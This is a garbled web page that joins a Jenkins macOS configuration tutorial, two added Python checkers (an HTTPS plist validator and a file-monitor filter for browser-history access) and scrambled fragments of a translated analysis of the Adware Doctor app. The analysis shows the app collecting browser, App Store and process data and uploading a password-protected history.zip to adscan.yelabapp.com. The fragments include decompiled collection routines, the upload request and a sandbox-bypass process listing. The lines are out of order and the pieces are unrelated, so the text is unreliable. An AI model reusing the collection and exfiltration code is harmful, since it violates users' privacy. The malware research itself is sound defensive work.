Jenkins Series: Environment Configuration Overview
In Adware Doctor's marketing, it is the "best app" for Mac users to defend against all kinds of common adware threats:
Understanding the Jenkins environment
- Jenkins configuration file paths
  - Jenkins working directory: /Users/Shared/Jenkins/Home; under it:
    - Jobs directory: /jobs
    - Single job directory: /jobs/<job name>
    - Job configuration file: /jobs/<job name>/config.xml
    - Job builds directory: /jobs/<job name>/builds
    - Job workspace directory: /jobs/<job name>/workspace
    - Plugins directory: /plugins
  - Jenkins launchd configuration file: /Library/LaunchDaemons/org.jenkins-ci.plist, which configures:
    - the log file path
    - the Jenkins working directory
    - the Jenkins startup script
    - the user account Jenkins runs as
  - Jenkins parameter file: /Library/Preferences/org.jenkins-ci.plist, which configures:
    - the HTTP port
    - the HTTPS port
    - the HTTPS certificate
    - and so on
  - Log file: /private/var/log/jenkins/jenkins.log
  - Launch directory: /Library/Application Support/Jenkins
    - Startup script: jenkins-runner.sh
    - Uninstall script: Uninstall.command
Restarting Jenkins
- Via the web UI: http://*****/restart
- By rebooting the machine
- Manually (unload the daemon, then load it again):
sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
2. Configuring HTTPS for Jenkins
Generate an HTTPS certificate
Configure the certificate location
Save the private key to /Users/Shared/Jenkins/zhengshu/server-key.pem
Save the certificate to /Users/Shared/Jenkins/zhengshu/server-cert.pem
Configure the /Library/Preferences/org.jenkins-ci.plist file
Add httpsPort : 8443
Add httpsPrivateKey : /Users/Shared/Jenkins/zhengshu/server-key.pem
Add httpsCertificate : /Users/Shared/Jenkins/zhengshu/server-cert.pem
Configure the /Library/Application Support/Jenkins/jenkins-runner.sh file
Add the line add_to_args httpsPrivateKey
Add the line add_to_args httpsCertificate
Restart Jenkins
- By rebooting the machine
- Manually:
sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
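Added example (not from the original tutorial): a Python check for the HTTPS settings described above. It assumes, as the macOS installer's jenkins-runner.sh does, that each add_to_args key is read from /Library/Preferences/org.jenkins-ci.plist and passed to Jenkins as --key=value; the plist, key and certificate it checks are constructed placeholders in a temporary directory. Beyond the page's steps it also flags a private key readable by other users and an HTTP listener left enabled alongside HTTPS (Jenkins disables plain HTTP when httpPort is -1).

```python
"""Validate the HTTPS keys that jenkins-runner.sh reads from org.jenkins-ci.plist.

Assumptions (not from the page): add_to_args <key> becomes --<key>=<value>;
the plist and PEM files used in demo() are constructed placeholders."""
import os
import plistlib
import stat
import tempfile

HTTPS_KEYS = ("httpsPort", "httpsPrivateKey", "httpsCertificate")


def build_args(prefs: dict, keys=HTTPS_KEYS) -> list:
    """Mimic add_to_args: one --key=value per key present in the plist (assumption)."""
    return [f"--{k}={prefs[k]}" for k in keys if prefs.get(k) not in ("", None)]


def check_https_config(plist_path: str) -> list:
    """Return a list of findings; an empty list means the HTTPS settings look sane."""
    findings = []
    with open(plist_path, "rb") as fh:
        prefs = plistlib.load(fh)

    port = prefs.get("httpsPort")
    if not isinstance(port, int) or not 1 <= port <= 65535:
        findings.append("httpsPort missing or not a valid TCP port")

    for key in ("httpsPrivateKey", "httpsCertificate"):
        path = prefs.get(key)
        if not path:
            findings.append(f"{key} not set")
            continue
        if not os.path.isfile(path):
            findings.append(f"{key} points to a missing file: {path}")
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        # The private key must not be readable by other local users.
        if key == "httpsPrivateKey" and mode & (stat.S_IRWXG | stat.S_IRWXO):
            findings.append(f"{path} is group/world accessible (mode {mode:04o}); use 0600")

    # Jenkins keeps serving plain HTTP unless httpPort is set to -1.
    if prefs.get("httpPort", 8080) != -1:
        findings.append("httpPort still enabled; set httpPort to -1 once HTTPS works")
    return findings


def demo(world_readable_key: bool = False):
    """Build a constructed plist plus placeholder PEM files and check them."""
    tmp = tempfile.mkdtemp()
    key_path = os.path.join(tmp, "server-key.pem")
    cert_path = os.path.join(tmp, "server-cert.pem")
    for p in (key_path, cert_path):
        with open(p, "w") as fh:
            fh.write("-----BEGIN PLACEHOLDER-----\n")  # constructed, not a real PEM
    os.chmod(key_path, 0o644 if world_readable_key else 0o600)
    os.chmod(cert_path, 0o644)
    prefs = {
        "httpPort": -1,
        "httpsPort": 8443,
        "httpsPrivateKey": key_path,
        "httpsCertificate": cert_path,
    }
    plist_path = os.path.join(tmp, "org.jenkins-ci.plist")
    with open(plist_path, "wb") as fh:
        plistlib.dump(prefs, fh)
    return check_https_config(plist_path), build_args(prefs)


if __name__ == "__main__":
    findings, args = demo()
    print("args:", " ".join(args))
    print("findings:", findings or "none")
    print("with 0644 key:", demo(world_readable_key=True)[0])
```

Run it against the real plist by calling check_https_config("/Library/Preferences/org.jenkins-ci.plist") on the Jenkins host; the demo() wrapper exists only so the check can be exercised without touching the system files.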
[r14 appendString:@"\n===process===\n"];
[
--Boundary-D779386A-2A17-4264-955A-94C5FC6F5AFA
rax = sysctl(0x10007df90, 0x3, 0x0, r13, 0x0, 0x0);
{
/Users/user
r15 = [[ACECommon realHomeDirectory] retain];
Content-Type: application/zip
proc_pidpath(*(int32_t *)(r14 - 0xcb), &var_1030, 0x1000);
1759 bash 501 user /bin/bash
First, after running a file monitor (for example macOS's built-in fs_usage) and filtering (case-insensitively) for files whose names contain "history", some anomalous file accesses came to light:
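Added example (not part of the original article): the filter the researchers describe, applied to file-monitor output in Python. It assumes lines in the simplified "<process>.<pid> <operation> <path>" form this page shows rather than raw fs_usage columns; the sample lines are constructed, and the allowlist of legitimate readers (Spotlight's mdworker) is an assumption. It goes one step further than the page's plain "history" filter by separating reads of another application's history store from writes of history files into the reader's own sandbox container, which together are the staging pattern described below.

```python
"""Filter file-monitor lines for browser-history access by processes that do not own it.

Assumptions (not from the page): simplified "<proc>.<pid> <op> <path>" lines;
SAMPLE_LINES and ALLOWLIST are constructed for the example."""
import re
from collections import defaultdict

# Constructed sample capture, not a real fs_usage trace.
SAMPLE_LINES = """\
Adware Doctor.44148 open ~/Library/Safari/History.db
Adware Doctor.44148 open ~/Library/Application Support/Google/Chrome/Default/History
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/safariHistory
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/chromeHistory
mdworker.1709 open ~/Library/Safari/History.db
Safari.2210 WrData[A] ~/Library/Safari/History.db
Adware Doctor.44148 open ~/Library/Application Support/CallHistoryDB
Terminal.3001 open ~/Documents/notes.txt
"""

LINE_RE = re.compile(r"^(?P<proc>.+?)\.(?P<pid>\d+)\s+(?P<op>\S+)\s+(?P<path>.+)$")

# Browser history stores named on the page, with the process expected to own each.
BROWSER_HISTORY = {
    "safari": (re.compile(r"/Library/Safari/History\.db$"), "Safari"),
    "chrome": (re.compile(r"/Library/Application Support/Google/Chrome/[^/]+/History$"), "Google Chrome"),
}
ALLOWLIST = {"mdworker"}  # Spotlight indexer reads these files legitimately (assumption)
CONTAINER_RE = re.compile(r"^~/Library/Containers/([^/]+)/.*history", re.IGNORECASE)


def parse(text):
    """Yield one dict per well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def history_events(text):
    """The page's filter: keep only paths containing 'history', case-insensitively."""
    return [ev for ev in parse(text) if "history" in ev["path"].lower()]


def foreign_history_readers(text):
    """Process -> browsers whose history store it touched without owning it."""
    found = defaultdict(set)
    for ev in history_events(text):
        if ev["proc"] in ALLOWLIST:
            continue
        for browser, (rx, owner) in BROWSER_HISTORY.items():
            if rx.search(ev["path"]) and ev["proc"] != owner:
                found[ev["proc"]].add(browser)
    return {proc: sorted(b) for proc, b in found.items()}


def container_history_writes(text):
    """Process -> sandbox containers into which it wrote files named *history*."""
    found = defaultdict(set)
    for ev in history_events(text):
        m = CONTAINER_RE.match(ev["path"])
        if m and ev["op"].startswith("Wr"):
            found[ev["proc"]].add(m.group(1))
    return {proc: sorted(c) for proc, c in found.items()}


def staging_candidates(text):
    """Processes that both read another app's history and write history files into their own container."""
    readers = foreign_history_readers(text)
    writers = container_history_writes(text)
    return sorted(p for p in readers if p in writers)


if __name__ == "__main__":
    print("readers:", foreign_history_readers(SAMPLE_LINES))
    print("writers:", container_history_writes(SAMPLE_LINES))
    print("staging candidates:", staging_candidates(SAMPLE_LINES))
```

On a real host, feed the function the monitor output after normalising each record to the "<proc>.<pid> <op> <path>" shape; the owner map and allowlist are the knobs that keep the browsers and indexers themselves out of the result.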
var_1070 = var_1068;
1hour, 10minute, 31second
[r14 appendString:rbx];
"-c",
In-depth analysis
rbx = [[FMDatabaseQueue databaseQueueWithPath:var_170] retain];
rbx = [[ACECommon collectProcessList2] retain];
[rbx release];
(lldb) po [$rdi launchPath]
rbx = [[r15 stringByAppendingPathComponent:@"Library/Safari/History.db"] retain];
Running a process monitor (for example the open-source ProcInfo utility), one can observe Adware Doctor using the built-in zip utility to create a password-protected history.zip archive:
By editing the system's /etc/hosts file to redirect this request to a server controlled by the researchers, Adware Doctor's attempt to upload the history.zip file was captured:
"/Library/LaunchDaemons/com.mixlr.MixlrAudioLink.plist",
"/Library/LaunchDaemons/com.mcafee.ssm.ScanManager.plist",
r15 = [[rbx stringByAppendingPathComponent:r12] retain];
===System===
[r13 release];
Adware Doctor's behavior violates the strict rules and policies of Apple's Mac App Store. For example, the "Data Collection and Storage" section of the App Store Review Guidelines states:
The "history.zip" file queued for upload is password-protected:
r15 = [[ACECommon realHomeDirectory] retain];
...
is blocked (denied) by the macOS application sandbox, because enumerating running processes (from within the sandbox) is "forbidden":
}
]
Accept-Language: en-us
rax = sub_1000519ad(&var_1068, &var_10A0,
)
Adware Doctor.44148 open ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history.zip
r13 = [[NSString stringWithFormat:@"Library/Application Support/Google/Chrome/%@/History"] retain];
{
As shown in the figure, the downloaded master.1.5.5.js file contains basic JSON configuration data:
[var_1F0 sendPostRequestWithSuffix:@"checkadware" params:r12 file:rbx];
....
f1a19b8929ec88a81a6bdce6d5ee66e6,
rbx = [[self readLaunchFolder:r13] retain];
Connection: keep-alive
filePathPatten = (
path: /bin/bash
User-Agent: Adware%20Doctor/1026 CFNetwork/902.1 Darwin/17.7.0 (x86_64)
Back in the Adware Doctor interface, the app is ready to clean the user's system:
For example Adware.MAC.Pirrit:
/Applications/DVD Player.app(1396-07-20 02:11:55 +0000)
Host: adscan.yelabapp.com
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/safariHistory
The app also has a method named collectAppStoreHistoryToFile, which attempts to obtain all of the user's recent searches in the App Store app:
pid: 2634
rbx = [[rbx stringByAppendingPathComponent:r13] retain];
[var_38 release];
[r14 appendString:@"===OS UpTime===\n"];
"/Applications/SoftwareUpdater",
"/Library/LaunchDaemons/com.microsoft.autoupdate.helper.plist",
}
https://www.google.com/search?q=if+i+punch+myself+in+the+face+and+it+hurts+does+that+make+me+weak+or+strong 2018-08-20 21:19:57
Entering webtool as the password unpacks the archive:
In the debugger (lldb), the attempt to access the user's home directory can be observed:
}
"com.webshoppers.agent.plist",
Attachment: 'history.zip' (length: 15810)
/Applications/Photo Booth.app(1396-04-25 01:50:31 +0000)
the program has been reviewed and signed by Apple;
the program runs in a sandbox.
(lldb) po $rdx
This entitlement means the app may request permission for particular files and, once the user explicitly approves, read and write them. On first run, Adware Doctor requests access to the user's home directory and every file and directory beneath it:
At this point there are three questions to answer:
Path: /1/checkadware
},
Adware Doctor.44148 open ~/Library/Application Support/CallHistoryTransactions
)
...
r14 = [r13 hasAccessPremisionPath:rbx];
The researchers studied the application with static analysis (decompilation) and dynamic analysis (network monitoring, file monitoring and debugging); the process and results follow.
"/Library/LaunchAgents/com.microsoft.update.agent.plist",
...
Each of these methods contains code for extracting browser history.
}
(lldb) "/Applications/Adware Doctor.app"
0x10000cec5 <+6>: pushq %r14
This is implemented by the [MainWindowController showFileAccess] method:
rbx = [[ACECommon fileStringWithPath:@"/Applications"] retain];
"faq_link": "http://www.adwaredoctor.com/adware-doctor-faq/"
[r14 appendString:@"\n===process2===\n"];
},
After collecting the user's data, the app compresses everything into the history.zip file and sends it:
},{
1709 mdwrite 501 user /System/Library/Frame
From a security and privacy standpoint, installing applications from the official Mac App Store has two main advantages:
[rbx release];
===OS UpTime===
[rbx release];
"/Library/LaunchDaemons/com.intel.haxm.plist",
},
}
Content-Type: multipart/form-data; boundary=Boundary-E2AE6908-4FC6-4C1D-911A-0B34F844C510
(lldb) po $rdi
-c,
"disable_prescan": false,
r12 = [r14 initWithFormat:@"%@/Library/Application Support/%@/appStoreData", r15, rbx]
When an application runs in the sandbox, the files and user information it can reach are very limited; it should not be able to read the user's browser history, yet Adware Doctor managed to.
var_30 = [[AppSandboxFileAccess fileAccess] retain];
The application is very popular in the Mac App Store, ranking fourth among top-grossing apps, so even Apple's Mac App Store website lists it:
}
"/Applications/WebShoppy",
"content": "/Users/user/Downloads/charles-proxy-4.2.6.dmgn1397-06-02 20:48:18 +0000n(n "https://www.charlesproxy.com/assets/release/4.2.6/charles-proxy-4.2.6.dmg",n "https://www.charlesproxy.com/latest-release/download.do"n)nde043b43c49077bbdce75de22e2f2d54n"
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/chromeHistory
patten = "Chrome.*feed\.snowbitt\.com.*publisher=tingnew";
The call to sysctl, together with the string GetBSDProcessList, yields the process list. This is Apple's own GetBSDProcessList sample code, which obtains a process list from inside the app sandbox; in other words, the code Adware Doctor uses to get around the sandbox comes directly from Apple.
po $rax
rbx = malloc(0x0);
Adware Doctor.44148 WrData[A] ~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/firefoxHistory
===Applications===
"/Library/LaunchDaemons/com.crashplan.engine.plist"
"com.WebShoppers.agent.plist",
/Applications/Chess.app(1396-06-15 01:20:21 +0000)
rbx = [r15 pattenDic];
(lldb) x/s $rsi
(lldb) po [$rdi launchPath]
{
000000010007df90 dd 0x00000001 ;CTL_KERN
/Library/LaunchAgents/com.vmware.launchd.vmware-tools-userd.plist
sub_1000519ad is called, then the list it returns is iterated and proc_pidpath is invoked for each entry. sub_1000519ad returns a list of process IDs:
444 root wheel
Adware Doctor.44148 open ~/Library/Application Support/CallHistoryDB
[r14 appendFormat:@"%@\n"];
rbx = [[ACECommon collectProcessList] retain];
/* @class MainWindowController */
1758 login 0 root /usr/bin/login
These characteristics look like those of an anti-adware app, and the hashes do indeed match known adware:
"content": "/Users/user/Downloads/googlechrome.dmgn1397-06-02 21:15:46 +0000n(n "https://dl.google.com/chrome/mac/stable/GGRO/googlechrome.dmg",n "https://www.google.com/chrome/"n)n5533641bc4cc7af7784565ac2386a807n"
(lldb) po $rdx
The researchers inspected the database's contents; it is encrypted (consistent with anti-adware/anti-malware practice):
[r14 appendFormat:@"%@\n"];
}
With the help of the AppSandboxFileAccess class:
{
rbx = [[BSUtil realHomeDirectory] retain];
md5 = (
[r14 release];
},{
(lldb) po [$rdi arguments]
r14 = [[FMDatabaseQueue databaseQueueWithPath:rbx] retain];
*Reference source: theregister; compiled by Freddy; please credit FreeBuf.COM when reposting.
(lldb)
+(void *)collectProcessList2
{
[r14 appendFormat:@"%@\n"];
0x10006a147: "hasAccessPremisionPath:"
+(void)collectSafariHistoryToFile:(void *)arg2 {
...
}
"~/Library/LaunchAgents/com.spotify.webhelper.plist",
Preface
Note that this psCommonInfo is also exfiltrated to adscan.yelabapp.com (inside the history.zip archive):
r13 = [[AppSandboxFileAccess fileAccess] retain];
Accept: */*
Adware Doctor
...
Up to the step above nothing looks unusual, but what follows is another matter.
(lldb) po $rdi
# ./procInfo
rbx = [[self readLaunchFolder:@"/Library/LaunchDaemons"] retain];
},
[rbx release];
"/Applications/WebTools",
)
[r14 appendString:@"\n===Applications===\n"];
r15 = [[rbx stringByAppendingPathComponent:@"Library/Containers/com.apple.appstore/Data/Library/Caches/com.apple.appstore/WebKitCache/Version 11/Blobs", 0x0, 0x0] retain];
"~/Library/WebTools",
"/Library/LaunchDaemons/net.privatetunnel.ovpnagent.plist",
0x10000cec0 <+1>: movq %rsp, %rbp
$ cat com.yelab.Browser-Sweeper/Data/Library/Application Support/com.yelab.Browser-Sweeper/history/safariHistory
192.168.86.76 - - [20/Aug/2018 10:53:24] "POST /1/checkadware HTTP/1.1" 200 -
...
(lldb) po $rdi
In the "Paid Utilities" category, Adware Doctor ranks first:
...
Headers:
Foreign media recently reported that Adware Doctor, the top-ranked paid security app in the Mac App Store, was found by researchers to collect browsing history without user consent and send it to a server located in China; the app was subsequently removed from the Mac App Store.
Using a network proxy monitor (Charles Proxy), Adware Doctor's connection attempt to adscan.yelabapp.com was captured:
rbx = [[ACECommon getSystemUpTime] retain];
===Launch===
This article was published by 蒲京娱乐场 under FAQ; please cite the source when reposting: Jenkins Series: Environment Configuration Overview